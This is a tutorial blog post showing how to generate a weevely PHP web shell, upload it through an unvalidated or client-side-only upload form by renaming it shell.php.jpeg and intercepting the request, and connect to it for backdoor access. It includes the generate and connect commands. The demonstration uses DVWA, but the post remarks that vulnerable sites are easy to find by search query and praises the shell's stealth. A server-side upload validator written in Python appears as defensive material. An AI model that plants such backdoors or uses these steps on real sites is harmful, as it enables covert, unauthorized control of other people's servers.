How to upload a PHP web shell using weevely to get backdoor access

by hash3liZer . 02 August 2018

Getting backdoor access means having another way in, usually a hidden one, through which you can come and go without anyone else noticing. Backdoors are normally installed through some sort of upload functionality where the uploaded data is not validated. This allows an attacker to simply put a malicious file in the upload field and submit the form. Most PHP-based websites are vulnerable to these kinds of attacks.

There are various kinds of backdoor shells to be found on the internet. For now, we are going to look at the weevely shell, the simplest type of shell, which you control from the command line. Its agent consists of only a few lines of PHP, which makes it much lighter than most traditional backdoor shells and helps it slip past file-size limits on uploads.

Let's put it all together. We are going to upload a backdoor shell generated by weevely to gain backdoor access to a target site. To stay within the rules, I've set up a DVWA application on a server for demonstration. Finding vulnerable PHP applications is not much of a difficult task: you just have to put the right query in and the results will be in front of you.

STEP 1

Generate the shell.

First, we need the shell. The weevely syntax is pretty simple. Weevely encodes the payload with a key phrase, so nobody else can use it to access the target system. Since it is a PHP shell, it requires PHP on the target system.

Remember that you cannot execute a Python shell on a PHP application, or a PHP shell on a Python application, because the runtime environment differs between the two.

Generate a shell with the command:

$ weevely generate [password] [path]
[screenshot: weevely shell]

STEP 2

Uploading Shell

The next thing you have to do is upload the shell, which is not always a straightforward process. You have to find a way in through the application. I have the DVWA application hosted on a server, and we are going to try out some tweaks to upload the shell.

The simplest case is where there is no validation at all. Upload the file and you are good to go:

[screenshot: uploading shell]

In some cases there will be validation on the client side only, i.e. JavaScript validation, which can be bypassed by intercepting the request with a proxy and modifying it. In this case you could rename the file to shell.php.jpeg:

[screenshot: client validation]

And then intercept and manipulate the request using a proxy:

[screenshot: proxy manipulation]

Remember that while uploading a shell, you have to take care of two things:

  • Where the shell is being uploaded. This is the relative path that we will use to interact with the system afterwards.
  • The extension must be one the target platform executes. In our case, it is .php.

In our case the full path to our PHP payload is http://target.com/dvwa/hackable/uploads/shell.php.
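From the defender's side, the client-side check bypassed above is no protection at all; the decision has to be made on the server. The following is an added example, not code from the original post or from DVWA, of a server-side upload check that rejects the shell.php.jpeg trick, allows only a short list of image extensions, verifies the file's magic bytes against the declared type, and stores the file under a random name. The function names, allowlists and sample inputs are all constructed for illustration.

```python
import os
import secrets
from typing import Tuple

# Allowlist of extensions this (hypothetical) image upload endpoint accepts.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Extensions a typical web server hands to an interpreter. Their presence
# anywhere in the name (shell.php.jpeg, shell.phtml) is rejected outright.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                         "asp", "aspx", "jsp", "cgi"}
# Leading bytes for the accepted image types (standard magic numbers).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Every check runs on the server side."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop path parts
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    exts = parts[1:]
    # Checked before the allowlist so shell.php.jpeg is named as what it is.
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, "executable extension in name"
    if len(exts) > 1:
        return False, "multiple extensions"
    ext = exts[0]
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension .%s not allowed" % ext
    # The declared type must match the bytes actually uploaded.
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    # Catch image/PHP polyglots: a valid header followed by a PHP open tag.
    if b"<?php" in content:
        return False, "PHP open tag inside file body"
    return True, "ok"


def stored_name(filename: str, content: bytes) -> str:
    """Random server-chosen name; the user-supplied name is never reused.
    Store the result outside the web root or in a directory with script
    execution disabled."""
    ok, reason = validate_upload(filename, content)
    if not ok:
        raise ValueError(reason)
    return secrets.token_hex(16) + "." + filename.lower().rsplit(".", 1)[1]
```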

STEP 3

Gaining Access

The last phase is to establish a connection with the payload and interact with the target. To open a session between the server and the client, execute the command:

$ weevely http://target/dvwa/hackable/uploads/shell.php [password]
[screenshot: weevely shell]

If everything goes right and the shell executes successfully on the server, you will get a prompt in your terminal:

[screenshot: terminal]

Conclusion

We used weevely to generate and execute a shell on a vulnerable target application and used it to gain backdoor access to the target system. Weevely shells are quite good in terms of stealthy execution and payload size. Note that it is good practice to use a payload that matches the target, such as ASP shells for ASP.NET applications.